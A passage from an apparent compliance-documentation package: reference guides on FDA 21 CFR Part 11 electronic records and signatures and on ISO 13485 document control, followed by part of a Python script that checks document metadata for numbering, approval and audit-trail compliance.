| Predicate Rule | Record Type |
|----------------|-------------|
| 21 CFR 820 (QSR) | Device Master Records, Device History Records |
| 21 CFR 211 (cGMP) | Batch records, laboratory records |
| 21 CFR 58 (GLP) | Study records, raw data |
| 21 CFR 11.10(e) | Records required to be maintained |
---
## Electronic Record Requirements
### General Requirements (§11.10)
Closed systems must implement controls including:
1. **System Validation** - Accuracy, reliability, consistent intended performance
2. **Record Generation** - Accurate and complete copies in human-readable form
3. **Record Protection** - Throughout retention period
4. **Access Control** - Limit system access to authorized individuals
5. **Audit Trail** - Secure, computer-generated, time-stamped record
6. **Operational Checks** - Enforce permitted sequencing of steps
7. **Authority Checks** - Restrict functions to authorized individuals
8. **Device Checks** - Determine validity of input/output devices
9. **Training** - Personnel education and experience
10. **Documentation** - Written policies and accountability
### Audit Trail Requirements
| Requirement | Implementation |
|-------------|----------------|
| Secure | Cannot be modified or deleted by users |
| Computer-generated | System creates automatically, not manually entered |
| Time-stamped | Date and time of each action recorded |
| Independent | Stored separately from application data |
| Original values | Previous values retained when modified |
| Who, what, when | User identity, action taken, date/time |
| Reason for change | Where required by predicate rule |
### Audit Trail Entries
| Event Type | Data Captured |
|------------|---------------|
| Record Creation | User, date/time, initial values |
| Record Modification | User, date/time, old value, new value, reason |
| Record Deletion | User, date/time, reason (if permitted) |
| Login/Logout | User, date/time, success/failure |
| Signature Application | User, date/time, signature meaning |
| Failed Access | User attempted, date/time, reason |
### Record Copy Requirements
Must be able to generate accurate and complete copies:
| Format | Requirement |
|--------|-------------|
| Electronic | Export in standard format (PDF, XML) |
| Paper | Human-readable printout |
| FDA Inspection | Provide copies upon request |
| Audit Trail | Include with record or separately |
---
## Electronic Signature Requirements
### General Requirements (§11.50, 11.100)
| Requirement | Implementation |
|-------------|----------------|
| Unique to individual | Not shared between persons |
| Not reused | Identifier not assigned to another person |
| Identity verification | Verify identity before assignment |
| Certification | Certify to FDA that signatures are binding |
### Signature Components (§11.200)
| Type | Components Required |
|------|---------------------|
| Non-biometric | At least two distinct identification components |
| - First signing | Both components (user ID + password) |
| - Subsequent signings | At least one component within controlled session |
| Biometric | Biometric designed for individual identification |
### Signature Manifestations (§11.50)
Electronic signatures must include:
| Element | Requirement |
|---------|-------------|
| Printed name | Full name of signer |
| Date and time | When signature was applied |
| Meaning | Purpose of signature (e.g., review, approval, responsibility) |
### Signature/Record Linking (§11.70)
| Requirement | Implementation |
|-------------|----------------|
| Linked to record | Signature cannot be excised, copied, or transferred |
| Cannot falsify | Technical controls prevent counterfeiting |
| Cannot repudiate | Signer cannot deny signing |
### Signature Certification
Organizations must submit certification to FDA (§11.100(c)):
```
SAMPLE CERTIFICATION LETTER
[Date]
Food and Drug Administration
[Appropriate Center Address]
Subject: Electronic Signature Certification
[Company Name] hereby certifies that all electronic signatures
used in our FDA-regulated systems are the legally binding
equivalent of traditional handwritten signatures.
This certification is made in accordance with 21 CFR Part 11,
Section 11.100(c).
Sincerely,
[Authorized Representative]
[Title]
```
---
## System Controls
### Administrative Controls
| Control | Implementation |
|---------|----------------|
| Written policies | SOPs for electronic records and signatures |
| Roles and responsibilities | Defined system access roles |
| Training program | Initial and periodic training |
| Periodic review | Regular assessment of controls |
| Accountability | Individual responsibility for actions |
### Operational Controls
| Control | Implementation |
|---------|----------------|
| Sequence enforcement | System enforces step order |
| Time limits | Session timeout after inactivity |
| Event logging | All significant events recorded |
| Error handling | System prevents invalid operations |
| Backup/recovery | Regular backup and tested recovery |
### Technical Controls
| Control | Implementation |
|---------|----------------|
| User authentication | Unique ID + password minimum |
| Password complexity | Minimum length, character requirements |
| Password expiration | Periodic change requirement |
| Account lockout | Lock after failed attempts |
| Access control | Role-based permissions |
| Encryption | Data in transit and at rest |
### Password Requirements
| Requirement | Specification |
|-------------|---------------|
| Minimum length | 8 characters minimum |
| Complexity | Upper, lower, number, special character |
| History | Cannot reuse last 12 passwords |
| Expiration | Maximum 90 days |
| Lockout | 5 failed attempts, 30-minute lockout |
| Initial password | Must change on first login |
### Session Controls
| Control | Specification |
|---------|---------------|
| Inactivity timeout | Maximum 15 minutes |
| Session duration | Maximum 8 hours |
| Concurrent sessions | Limit or prevent |
| Re-authentication | Required for sensitive operations |
---
## Validation Requirements
### Validation Approach
| Phase | Activities |
|-------|------------|
| Planning | Validation plan, requirements, risk assessment |
| Specification | User requirements, functional specifications |
| Configuration | System setup, security configuration |
| Testing | IQ, OQ, PQ protocols and execution |
| Release | Validation summary report, release approval |
| Maintenance | Change control, periodic review |
### Validation Documentation
| Document | Purpose |
|----------|---------|
| Validation Plan | Scope, approach, responsibilities, schedule |
| User Requirements | What system must do (business requirements) |
| Functional Specification | How system will meet requirements |
| Design Specification | Technical implementation details |
| Test Protocols | IQ, OQ, PQ test procedures |
| Test Results | Executed protocols with evidence |
| Traceability Matrix | Requirements to test coverage |
| Validation Summary Report | Overall validation conclusion |
### Testing Categories
**Installation Qualification (IQ):**
- System installed per specifications
- Hardware and software inventory
- Configuration documentation
**Operational Qualification (OQ):**
- Functions operate as specified
- Audit trail verification
- Security control testing
- Error handling verification
**Performance Qualification (PQ):**
- System performs in production environment
- User acceptance testing
- Integration testing
- Load/stress testing (if applicable)
### Part 11 Specific Testing
| Test Area | Verification |
|-----------|--------------|
| Audit trail | All CRUD operations recorded correctly |
| Access control | Role permissions enforced |
| Electronic signatures | Signature components and linking |
| Record integrity | Data cannot be altered without detection |
| Backup/restore | Records restored accurately |
| Session controls | Timeout and lockout function |
| Password controls | Complexity and expiration enforced |
---
## Compliance Checklist
### System Assessment Checklist
**Administrative Controls:**
- [ ] Written policies for electronic records and signatures
- [ ] Defined roles and responsibilities
- [ ] Training program documented and executed
- [ ] Periodic review schedule established
- [ ] Accountability measures in place
**Access Controls:**
- [ ] Unique user identification for each person
- [ ] User IDs not shared or reassigned
- [ ] Password complexity requirements enforced
- [ ] Password expiration implemented
- [ ] Account lockout after failed attempts
- [ ] Role-based access control implemented
- [ ] Access periodically reviewed
**Audit Trail:**
- [ ] All record creation captured
- [ ] All record modifications captured
- [ ] Previous values retained
- [ ] User identity recorded
- [ ] Date/time stamp on all entries
- [ ] Audit trail secure from modification
- [ ] Audit trail available for review
**Electronic Signatures:**
- [ ] Signatures unique to individual
- [ ] At least two identification components
- [ ] Signature manifestation includes name, date/time, meaning
- [ ] Signatures linked to records
- [ ] Certification letter submitted to FDA
**Record Management:**
- [ ] Accurate copies can be generated
- [ ] Human-readable format available
- [ ] Records protected throughout retention
- [ ] Backup and recovery tested
**System Controls:**
- [ ] Session timeout implemented
- [ ] Operational sequence enforcement
- [ ] Input/output device validation
- [ ] Error handling documented
**Validation:**
- [ ] System validated for intended use
- [ ] Validation documentation complete
- [ ] Change control procedures in place
- [ ] Periodic review conducted
### Gap Assessment Template
```
PART 11 GAP ASSESSMENT
System: [System Name]
Assessment Date: [Date]
Assessor: [Name]
| Requirement | §11 Reference | Current State | Gap | Remediation | Priority |
|-------------|---------------|---------------|-----|-------------|----------|
| Audit trail | 11.10(e) | [Description] | [Y/N] | [Action] | [H/M/L] |
| Access control | 11.10(d) | [Description] | [Y/N] | [Action] | [H/M/L] |
| E-signatures | 11.50 | [Description] | [Y/N] | [Action] | [H/M/L] |
Summary:
- Total requirements assessed: [Number]
- Requirements met: [Number]
- Gaps identified: [Number]
- Remediation timeline: [Date]
```
### Periodic Review Schedule
| Review Type | Frequency | Scope |
|-------------|-----------|-------|
| Access review | Quarterly | User access appropriateness |
| Audit trail review | Monthly | Sample review of audit entries |
| Security review | Annually | Controls effectiveness |
| Validation review | Annually or on change | System still validated |
| Policy review | Annually | SOPs current and followed |
---
## Common Deficiencies
### FDA Warning Letter Themes
| Deficiency | Root Cause | Prevention |
|------------|------------|------------|
| Shared user accounts | Convenience over compliance | Enforce unique accounts |
| Inadequate audit trail | System limitation | Validate audit trail |
| Missing signatures | Process gap | Enforce signature workflow |
| Incomplete validation | Time/resource constraints | Plan adequate resources |
| No change control | Process not followed | Enforce change control |
| Password sharing | Culture issue | Training and enforcement |
### Remediation Priorities
| Priority | Deficiency Type | Timeline |
|----------|-----------------|----------|
| Critical | Audit trail missing/modifiable | Immediate |
| Critical | Signatures can be falsified | Immediate |
| High | Shared accounts in production | 30 days |
| High | Validation gaps | 60 days |
| Medium | Training gaps | 90 days |
| Low | Documentation gaps | 120 days |
FILE:references/document-control-procedures.md
# Document Control Procedures
Implementation guide for ISO 13485-compliant document control systems.
---
## Table of Contents
- [Document Numbering System](#document-numbering-system)
- [Document Lifecycle](#document-lifecycle)
- [Review and Approval Workflow](#review-and-approval-workflow)
- [Change Control Process](#change-control-process)
- [Distribution and Access Control](#distribution-and-access-control)
- [Record Retention](#record-retention)
---
## Document Numbering System
### Numbering Format
Standard format: `[PREFIX]-[CATEGORY]-[SEQUENCE]-[REVISION]`
| Component | Format | Example | Description |
|-----------|--------|---------|-------------|
| PREFIX | 2-3 letters | SOP, WI, TF | Document type identifier |
| CATEGORY | 2-3 digits | 01, 02, 10 | Functional area code |
| SEQUENCE | 3-4 digits | 001, 0001 | Sequential number within category |
| REVISION | Letter or number | A, 01 | Revision indicator |
### Document Type Prefixes
| Prefix | Document Type | Description |
|--------|---------------|-------------|
| QM | Quality Manual | Top-level QMS description |
| SOP | Standard Operating Procedure | Process procedures |
| WI | Work Instruction | Task-level instructions |
| TF | Template/Form | Controlled forms and templates |
| POL | Policy | Policy statements |
| SPEC | Specification | Product/process specifications |
| PLN | Plan | Project and quality plans |
| RPT | Report | Technical and quality reports |
### Category Codes
| Code | Functional Area | Examples |
|------|-----------------|----------|
| 01 | Quality Management | QMS procedures, audits |
| 02 | Document Control | This area |
| 03 | Human Resources | Training, competency |
| 04 | Design & Development | Design control |
| 05 | Purchasing | Supplier management |
| 06 | Production | Manufacturing |
| 07 | Quality Control | Inspection, testing |
| 08 | CAPA | Corrective/preventive actions |
| 09 | Risk Management | ISO 14971 processes |
| 10 | Regulatory Affairs | Submissions, compliance |
### Numbering Workflow
1. Author requests document number from Document Control
2. Document Control verifies category and assigns next sequence number
3. Document number recorded in Document Master List
4. Author creates document using assigned number
5. **Validation:** Number format matches standard; no duplicates exist
---
## Document Lifecycle
### Lifecycle Stages
```
DRAFT → REVIEW → APPROVED → EFFECTIVE → SUPERSEDED → OBSOLETE
│ │ │ │ │ │
│ │ │ │ │ └── Archived/Destroyed
│ │ │ │ └── New revision effective
│ │ │ └── Training complete, distribution done
│ │ └── All approvals obtained
│ └── Under review/revision
└── Initial creation
```
### Stage Definitions
| Stage | Definition | Actions Required |
|-------|------------|------------------|
| Draft | Document under creation or revision | Author editing, not for use |
| Review | Circulated for review and comment | Reviewers provide feedback |
| Approved | All required signatures obtained | Ready for training/distribution |
| Effective | Training complete, document released | Available for use |
| Superseded | Replaced by newer revision | Remove from active use |
| Obsolete | No longer applicable | Archive per retention schedule |
### Document Status Indicators
| Status | Indicator | Location |
|--------|-----------|----------|
| Draft | "DRAFT" watermark | Header or footer |
| Approved | Approval signatures with dates | Signature page |
| Effective | Effective date | Header |
| Obsolete | "OBSOLETE" stamp | Across all pages |
---
## Review and Approval Workflow
### Document Review Workflow
1. Author completes document draft
2. Author submits for review via DMS or routing form
3. Reviewers assigned based on document type and content
4. Reviewers provide comments within review period (typically 5-10 business days)
5. Author addresses comments and documents responses
6. Author resubmits for approval
7. Approvers sign and date
8. **Validation:** All required reviewers completed; all comments addressed
### Required Reviewers by Document Type
| Document Type | Required Reviewers | Required Approvers |
|---------------|-------------------|-------------------|
| SOP | Process Owner, QA | QA Manager, Process Owner |
| WI | Area Supervisor, QA | Area Manager |
| SPEC | Engineering, QA | Engineering Manager, QA |
| TF | Process Owner | QA |
| POL | Department Heads | Management Representative |
| Design Documents | Design Team, QA | Design Control Authority |
### Approval Matrix
```
APPROVAL AUTHORITY MATRIX
Document Level 1 (Policy): CEO or delegate + QA Manager
Document Level 2 (SOP): Department Manager + QA Manager
Document Level 3 (WI/TF): Area Supervisor + QA Representative
Regulatory Submissions: RA Manager + QA Manager + Technical Expert
Design Documents: Design Authority + QA Manager
```
### Review Comment Template
```
REVIEW COMMENT LOG
Document: [Document Number and Title]
Reviewer: [Name, Role]
Review Date: [Date]
| Section | Line/Para | Comment | Disposition | Response |
|---------|-----------|---------|-------------|----------|
| [Ref] | [Location] | [Issue/suggestion] | Accept/Reject/Modify | [Explanation] |
```
---
## Change Control Process
### Change Request Workflow
1. Identify need for document change
2. Complete Change Request Form (CRF)
3. Submit CRF to Document Control
4. Document Control assigns change number
5. Route to reviewers for impact assessment
6. Obtain approvals based on change classification
7. Author implements approved changes
8. **Validation:** Changes match approved scope; version number incremented
### Change Classification
| Class | Definition | Approval Level | Examples |
|-------|------------|----------------|----------|
| Administrative | No impact on content meaning | Document Control | Typos, formatting, references |
| Minor | Limited content change, no process impact | Process Owner + QA | Clarifications, minor additions |
| Major | Significant content change, process impact | Full review cycle | New requirements, process changes |
| Emergency | Urgent change required for safety/compliance | Expedited approval + retrospective review | Safety issues, regulatory mandates |
### Change Impact Assessment
| Impact Area | Assessment Questions |
|-------------|---------------------|
| Training | Does change require retraining? Who? |
| Equipment | Does change affect equipment or systems? |
| Validation | Does change require revalidation? |
| Regulatory | Does change affect regulatory filings? |
| Other Documents | Which related documents need updating? |
| Records | What records are affected? |
### Version Control Rules
| Change Type | Version Increment | Example |
|-------------|-------------------|---------|
| Major revision | Increment revision number | Rev 01 → Rev 02 |
| Minor revision | Increment sub-revision | Rev 01 → Rev 01.1 |
| Administrative | No version change (or sub-increment) | Rev 01 → Rev 01a |
| Draft iterations | Use draft version | Draft 1, Draft 2 |
### Change History Template
```
DOCUMENT CHANGE HISTORY
| Revision | Date | Description of Change | Author | Approver |
|----------|------|----------------------|--------|----------|
| 01 | YYYY-MM-DD | Initial release | [Name] | [Name] |
| 02 | YYYY-MM-DD | [Change description] | [Name] | [Name] |
```
---
## Distribution and Access Control
### Distribution Methods
| Method | Use Case | Control Mechanism |
|--------|----------|-------------------|
| Electronic (DMS) | Primary method | Access permissions |
| Controlled Print | Manufacturing floor | Signature log |
| Uncontrolled Copy | External distribution | Watermark "UNCONTROLLED" |
| Reference Copy | Training/archive | Watermark "REFERENCE ONLY" |
### Access Permission Levels
| Level | Permissions | Typical Roles |
|-------|-------------|---------------|
| Read | View documents only | General users |
| Print | View and print controlled copies | Area supervisors |
| Review | View, print, add comments | Reviewers |
| Author | Create, edit drafts | Document authors |
| Approve | Approve documents | Approvers |
| Admin | Full system access | Document Control |
### Controlled Print Log
```
CONTROLLED PRINT LOG
Document: [Document Number]
Revision: [Revision Number]
| Copy # | Location | Issued To | Date Issued | Date Returned | Signature |
|--------|----------|-----------|-------------|---------------|-----------|
| 001 | Production Area 1 | [Name] | [Date] | [Date] | [Sig] |
| 002 | QC Lab | [Name] | [Date] | [Date] | [Sig] |
```
### Obsolete Document Control
1. Mark document as "OBSOLETE" in DMS
2. Notify copy holders of obsolescence
3. Collect and destroy controlled prints
4. Update Document Master List
5. Archive master copy per retention schedule
6. **Validation:** No obsolete copies remain in active use areas
---
## Record Retention
### Retention Periods
| Record Type | Retention Period | Basis |
|-------------|------------------|-------|
| Device Master Record (DMR) | Life of device + 2 years | 21 CFR 820.181 |
| Device History Record (DHR) | Life of device + 2 years | 21 CFR 820.184 |
| Design History File (DHF) | Life of device + 2 years | 21 CFR 820.30 |
| Quality Records | 2 years beyond device discontinuation | ISO 13485 |
| Training Records | Duration of employment + 3 years | Best practice |
| Audit Records | 7 years | Best practice |
| Complaint Records | Life of device + 2 years | 21 CFR 820.198 |
| CAPA Records | 7 years | Best practice |
| Calibration Records | 2 years beyond equipment disposal | Best practice |
| Supplier Records | Life of relationship + 3 years | Best practice |
### Archive Requirements
| Requirement | Specification |
|-------------|---------------|
| Storage Conditions | Temperature 15-25°C, RH 30-60% |
| Access Control | Restricted to authorized personnel |
| Indexing | Searchable by document number, date, type |
| Media | Original format or validated conversion |
| Backup | Offsite backup for electronic records |
| Integrity Checks | Periodic verification of record legibility |
### Disposal Procedure
1. Verify retention period has expired
2. Check for legal holds or ongoing litigation
3. Obtain disposal authorization
4. Execute secure destruction (shred paper, wipe electronic)
5. Document disposal in Disposal Log
6. **Validation:** No premature disposal; disposal documented
### Disposal Log Template
```
RECORD DISPOSAL LOG
| Document/Record ID | Description | Retention Expired | Disposal Date | Method | Witness |
|--------------------|-------------|-------------------|---------------|--------|---------|
| [ID] | [Description] | [Date] | [Date] | Shred/Wipe | [Name] |
```
---
## Document Master List
### Master List Content
| Field | Description | Required |
|-------|-------------|----------|
| Document Number | Unique identifier | Yes |
| Title | Document title | Yes |
| Current Revision | Active revision number | Yes |
| Effective Date | Date document became effective | Yes |
| Status | Draft/Effective/Obsolete | Yes |
| Process Owner | Responsible party | Yes |
| Review Date | Next scheduled review | Yes |
| Category | Functional area | Yes |
| Storage Location | Physical or electronic location | Yes |
### Master List Maintenance
- Update within 24 hours of document status change
- Review quarterly for accuracy
- Audit annually for completeness
- Archive historical versions
### Sample Master List Entry
```
| Doc # | Title | Rev | Eff Date | Status | Owner | Review Date |
|-------|-------|-----|----------|--------|-------|-------------|
| SOP-02-001 | Document Control | 03 | 2024-01-15 | Effective | QA Mgr | 2025-01-15 |
| WI-06-012 | Assembly Line Setup | 02 | 2024-03-01 | Effective | Prod Mgr | 2025-03-01 |
```
FILE:scripts/document_validator.py
#!/usr/bin/env python3
"""
Document Validator - Quality Documentation Compliance Checker
Validates document metadata, numbering conventions, and control requirements
for ISO 13485 and 21 CFR Part 11 compliance.
Usage:
python document_validator.py --doc document.json
python document_validator.py --interactive
python document_validator.py --doc document.json --output json
"""
import argparse
import json
import re
import sys
from dataclasses import dataclass, field, asdict
from datetime import datetime, timedelta
from typing import List, Dict, Optional, Tuple
from enum import Enum
class DocumentType(Enum):
QM = "Quality Manual"
SOP = "Standard Operating Procedure"
WI = "Work Instruction"
TF = "Template/Form"
POL = "Policy"
SPEC = "Specification"
PLN = "Plan"
RPT = "Report"
class DocumentStatus(Enum):
DRAFT = "Draft"
REVIEW = "Under Review"
APPROVED = "Approved"
EFFECTIVE = "Effective"
SUPERSEDED = "Superseded"
OBSOLETE = "Obsolete"
class Severity(Enum):
CRITICAL = "Critical"
MAJOR = "Major"
MINOR = "Minor"
INFO = "Info"
@dataclass
class ValidationFinding:
rule: str
severity: Severity
message: str
recommendation: str
@dataclass
class Document:
number: str
title: str
doc_type: str
revision: str
status: str
effective_date: Optional[str] = None
review_date: Optional[str] = None
author: Optional[str] = None
approver: Optional[str] = None
approval_date: Optional[str] = None
change_history: List[Dict] = field(default_factory=list)
has_audit_trail: bool = False
has_electronic_signature: bool = False
signature_components: int = 0
@dataclass
class ValidationResult:
document_number: str
validation_date: str
total_findings: int
critical_findings: int
major_findings: int
minor_findings: int
compliance_score: float
findings: List[Dict]
recommendations: List[str]
class DocumentValidator:
"""Validator for quality documentation compliance."""
# Document number pattern: PREFIX-CATEGORY-SEQUENCE-REVISION
DOC_NUMBER_PATTERN = r'^([A-Z]{2,4})-(\d{2,3})-(\d{3,4})(?:-([A-Z]|\d{2}))?$'
# Valid document type prefixes
VALID_PREFIXES = ['QM', 'SOP', 'WI', 'TF', 'POL', 'SPEC', 'PLN', 'RPT']
# Category codes
VALID_CATEGORIES = ['01', '02', '03', '04', '05', '06', '07', '08', '09', '10']
def __init__(self, document: Document):
self.document = document
self.today = datetime.now()
self.findings: List[ValidationFinding] = []
def validate(self) -> ValidationResult:
"""Run all validation checks."""
self._validate_document_number()
self._validate_title()
self._validate_status_lifecycle()
self._validate_dates()
self._validate_approvals()
self._validate_change_history()
self._validate_electronic_controls()
# Calculate compliance score
score = self._calculate_compliance_score()
# Generate recommendations
recommendations = self._generate_recommendations()
# Count findings by severity
critical = len([f for f in self.findings if f.severity == Severity.CRITICAL])
major = len([f for f in self.findings if f.severity == Severity.MAJOR])
minor = len([f for f in self.findings if f.severity == Severity.MINOR])
return ValidationResult(
document_number=self.document.number,
validation_date=self.today.strftime("%Y-%m-%d"),
total_findings=len(self.findings),
critical_findings=critical,
major_findings=major,
minor_findings=minor,
compliance_score=round(score, 1),
findings=[asdict(f) for f in self.findings],
recommendations=recommendations
)
def _validate_document_number(self):
"""Validate document numbering convention."""
number = self.document.number
if not number:
self.findings.append(ValidationFinding(
rule="DOC-NUM-001",
severity=Severity.CRITICAL,
message="Document number is missing",
recommendation="Assign document number per numbering procedure"
))
return
match = re.match(self.DOC_NUMBER_PATTERN, number)
if not match:
self.findings.append(ValidationFinding(
rule="DOC-NUM-002",
severity=Severity.MAJOR,
message=f"Document number '{number}' does not match standard format",
recommendation="Use format: PREFIX-CATEGORY-SEQUENCE[-REVISION] (e.g., SOP-02-001-A)"
))
return
prefix, category, sequence, revision = match.groups()
if prefix not in self.VALID_PREFIXES:
self.findings.append(ValidationFinding(
rule="DOC-NUM-003",
severity=Severity.MAJOR,
message=f"Invalid document type prefix: {prefix}",
recommendation=f"Use one of: {', '.join(self.VALID_PREFIXES)}"
))
if category not in self.VALID_CATEGORIES:
self.findings.append(ValidationFinding(
rule="DOC-NUM-004",
severity=Severity.MINOR,
message=f"Non-standard category code: {category}",
recommendation=f"Standard categories are: {', '.join(self.VALID_CATEGORIES)}"
))
def _validate_title(self):
"""Validate document title."""
title = self.document.title
if not title:
self.findings.append(ValidationFinding(
rule="DOC-TTL-001",
severity=Severity.MAJOR,
message="Document title is missing",
recommendation="Provide descriptive document title"
))
return
if len(title) < 10:
self.findings.append(ValidationFinding(
rule="DOC-TTL-002",
severity=Severity.MINOR,
message="Document title is very short",
recommendation="Use descriptive title that clearly identifies content"
))
if len(title) > 100:
self.findings.append(ValidationFinding(
rule="DOC-TTL-003",
severity=Severity.MINOR,
message="Document title exceeds recommended length",
recommendation="Keep title under 100 characters"
))
def _validate_status_lifecycle(self):
"""Validate document status and lifecycle."""
status = self.document.status
if not status:
self.findings.append(ValidationFinding(
rule="DOC-STS-001",
severity=Severity.MAJOR,
message="Document status is missing",
recommendation="Assign appropriate document status"
))
return
valid_statuses = [s.value for s in DocumentStatus]
if status not in valid_statuses:
self.findings.append(ValidationFinding(
rule="DOC-STS-002",
severity=Severity.MAJOR,
message=f"Invalid document status: {status}",
recommendation=f"Use one of: {', '.join(valid_statuses)}"
))
# Check status-specific requirements
if status == DocumentStatus.EFFECTIVE.value:
if not self.document.effective_date:
self.findings.append(ValidationFinding(
rule="DOC-STS-003",
severity=Severity.MAJOR,
message="Effective document missing effective date",
recommendation="Add effective date for effective documents"
))
if status == DocumentStatus.APPROVED.value:
if not self.document.approval_date:
self.findings.append(ValidationFinding(
rule="DOC-STS-004",
severity=Severity.MAJOR,
message="Approved document missing approval date",
recommendation="Add approval date for approved documents"
))
def _validate_dates(self):
"""Validate document dates."""
# Check effective date
if self.document.effective_date:
try:
eff_date = datetime.strptime(self.document.effective_date, "%Y-%m-%d")
if eff_date > self.today:
self.findings.append(ValidationFinding(
rule="DOC-DTE-001",
severity=Severity.INFO,
message="Effective date is in the future",
recommendation="Verify planned effective date is correct"
))
except ValueError:
self.findings.append(ValidationFinding(
rule="DOC-DTE-002",
severity=Severity.MINOR,
message="Invalid effective date format",
recommendation="Use YYYY-MM-DD format for dates"
))
# Check review date
if self.document.review_date:
try:
review_date = datetime.strptime(self.document.review_date, "%Y-%m-%d")
if review_date < self.today:
self.findings.append(ValidationFinding(
rule="DOC-DTE-003",
severity=Severity.MAJOR,
message="Document is overdue for review",
recommendation="Initiate periodic review process"
))
elif review_date < self.today + timedelta(days=30):
self.findings.append(ValidationFinding(
rule="DOC-DTE-004",
severity=Severity.MINOR,
message="Document review due within 30 days",
recommendation="Plan for upcoming review"
))
except ValueError:
self.findings.append(ValidationFinding(
rule="DOC-DTE-005",
severity=Severity.MINOR,
message="Invalid review date format",
recommendation="Use YYYY-MM-DD format for dates"
))
else:
if self.document.status == DocumentStatus.EFFECTIVE.value:
self.findings.append(ValidationFinding(
rule="DOC-DTE-006",
severity=Severity.MINOR,
message="Effective document missing review date",
recommendation="Add next review date (typically 1-3 years from effective)"
))
def _validate_approvals(self):
"""Validate document approval information."""
if self.document.status in [DocumentStatus.APPROVED.value, DocumentStatus.EFFECTIVE.value]:
if not self.document.author:
self.findings.append(ValidationFinding(
rule="DOC-APR-001",
severity=Severity.MAJOR,
message="Document author not identified",
recommendation="Document author on signature page"
))
if not self.document.approver:
self.findings.append(ValidationFinding(
rule="DOC-APR-002",
severity=Severity.CRITICAL,
message="Document approver not identified",
recommendation="Obtain required approval signatures"
))
def _validate_change_history(self):
"""Validate change history completeness."""
history = self.document.change_history
if not history:
self.findings.append(ValidationFinding(
rule="DOC-CHG-001",
severity=Severity.MAJOR,
message="Document change history is missing",
recommendation="Include change history table with revision descriptions"
))
return
for i, entry in enumerate(history):
if not entry.get('revision'):
self.findings.append(ValidationFinding(
rule="DOC-CHG-002",
severity=Severity.MINOR,
message=f"Change history entry {i+1} missing revision number",
recommendation="Include revision number for each history entry"
))
if not entry.get('description'):
self.findings.append(ValidationFinding(
rule="DOC-CHG-003",
severity=Severity.MINOR,
message=f"Change history entry {i+1} missing description",
recommendation="Include description of changes for each revision"
))
if not entry.get('date'):
self.findings.append(ValidationFinding(
rule="DOC-CHG-004",
severity=Severity.MINOR,
message=f"Change history entry {i+1} missing date",
recommendation="Include date for each history entry"
))
def _validate_electronic_controls(self):
"""Validate 21 CFR Part 11 requirements for electronic documents."""
# Audit trail check
if not self.document.has_audit_trail:
self.findings.append(ValidationFinding(
rule="P11-AUD-001",
severity=Severity.MAJOR,
message="Electronic document lacks audit trail",
recommendation="Enable audit trail for 21 CFR Part 11 compliance"
))
# Electronic signature check
if self.document.has_electronic_signature:
if self.document.signature_components < 2:
self.findings.append(ValidationFinding(
rule="P11-SIG-001",
severity=Severity.CRITICAL,
message="Electronic signature uses fewer than 2 identification components",
recommendation="Use at least 2 components (e.g., user ID + password)"
))
else:
if self.document.status in [DocumentStatus.APPROVED.value, DocumentStatus.EFFECTIVE.value]:
self.findings.append(ValidationFinding(
rule="P11-SIG-002",
severity=Severity.INFO,
message="Document uses handwritten signatures",
recommendation="Consider electronic signatures for efficiency"
))
def _calculate_compliance_score(self) -> float:
"""Calculate compliance score based on findings."""
if not self.findings:
return 100.0
# Weight by severity
deductions = {
Severity.CRITICAL: 25,
Severity.MAJOR: 10,
Severity.MINOR: 3,
Severity.INFO: 0
}
total_deduction = sum(deductions[f.severity] for f in self.findings)
score = max(0, 100 - total_deduction)
return score
def _generate_recommendations(self) -> List[str]:
"""Generate prioritized recommendations."""
recommendations = []
# Critical findings
critical = [f for f in self.findings if f.severity == Severity.CRITICAL]
if critical:
recommendations.append(
f"URGENT: {len(critical)} critical finding(s) require immediate attention"
)
# Major findings
major = [f for f in self.findings if f.severity == Severity.MAJOR]
if major:
recommendations.append(
f"ACTION: {len(major)} major finding(s) should be addressed within 30 days"
)
# Review overdue
review_overdue = [f for f in self.findings if f.rule == "DOC-DTE-003"]
if review_overdue:
recommendations.append(
"REVIEW: Document is overdue for periodic review. Initiate review process."
)
# Part 11 gaps
p11_findings = [f for f in self.findings if f.rule.startswith("P11")]
if p11_findings:
recommendations.append(
f"COMPLIANCE: {len(p11_findings)} 21 CFR Part 11 gap(s) identified"
)
if not recommendations:
recommendations.append("Document passes validation checks")
return recommendations
def format_text_output(result: ValidationResult) -> str:
"""Format validation result as text report."""
lines = [
"=" * 70,
"DOCUMENT VALIDATION REPORT",
"=" * 70,
f"Document: {result.document_number}",
f"Validation Date: {result.validation_date}",
f"Compliance Score: {result.compliance_score}%",
"",
"FINDINGS SUMMARY",
"-" * 40,
f" Critical: {result.critical_findings}",
f" Major: {result.major_findings}",
f" Minor: {result.minor_findings}",
f" Total: {result.total_findings}",
]
if result.findings:
lines.extend([
"",
"DETAILED FINDINGS",
"-" * 40,
])
for finding in result.findings:
severity = finding['severity']
lines.append(f"\n[{severity}] {finding['rule']}")
lines.append(f" Issue: {finding['message']}")
lines.append(f" Action: {finding['recommendation']}")
lines.extend([
"",
"RECOMMENDATIONS",
"-" * 40,
])
for i, rec in enumerate(result.recommendations, 1):
lines.append(f"{i}. {rec}")
lines.append("=" * 70)
return "\n".join(lines)
def interactive_mode():
"""Run interactive document validation."""
print("=" * 60)
print("Document Validator - Interactive Mode")
print("=" * 60)
print("\nEnter document information:\n")
number = input("Document Number (e.g., SOP-02-001): ").strip()
title = input("Document Title: ").strip()
print("\nDocument Types: QM, SOP, WI, TF, POL, SPEC, PLN, RPT")
doc_type = input("Document Type: ").strip().upper()
revision = input("Revision (e.g., 01 or A): ").strip()
print("\nStatuses: Draft, Under Review, Approved, Effective, Superseded, Obsolete")
status = input("Status: ").strip()
effective_date = input("Effective Date (YYYY-MM-DD, or Enter to skip): ").strip() or None
review_date = input("Next Review Date (YYYY-MM-DD, or Enter to skip): ").strip() or None
author = input("Author Name (or Enter to skip): ").strip() or None
approver = input("Approver Name (or Enter to skip): ").strip() or None
has_audit = input("Has Audit Trail? (y/n): ").strip().lower() == 'y'
has_esig = input("Uses Electronic Signatures? (y/n): ").strip().lower() == 'y'
sig_components = 0
if has_esig:
sig_input = input("Number of signature components (e.g., 2): ").strip()
sig_components = int(sig_input) if sig_input.isdigit() else 0
doc = Document(
number=number,
title=title,
doc_type=doc_type,
revision=revision,
status=status,
effective_date=effective_date,
review_date=review_date,
author=author,
approver=approver,
has_audit_trail=has_audit,
has_electronic_signature=has_esig,
signature_components=sig_components
)
validator = DocumentValidator(doc)
result = validator.validate()
print("\n" + format_text_output(result))
def main():
parser = argparse.ArgumentParser(
description="Quality Documentation Validator"
)
parser.add_argument(
"--doc",
type=str,
help="JSON file with document metadata"
)
parser.add_argument(
"--output",
choices=["text", "json"],
default="text",
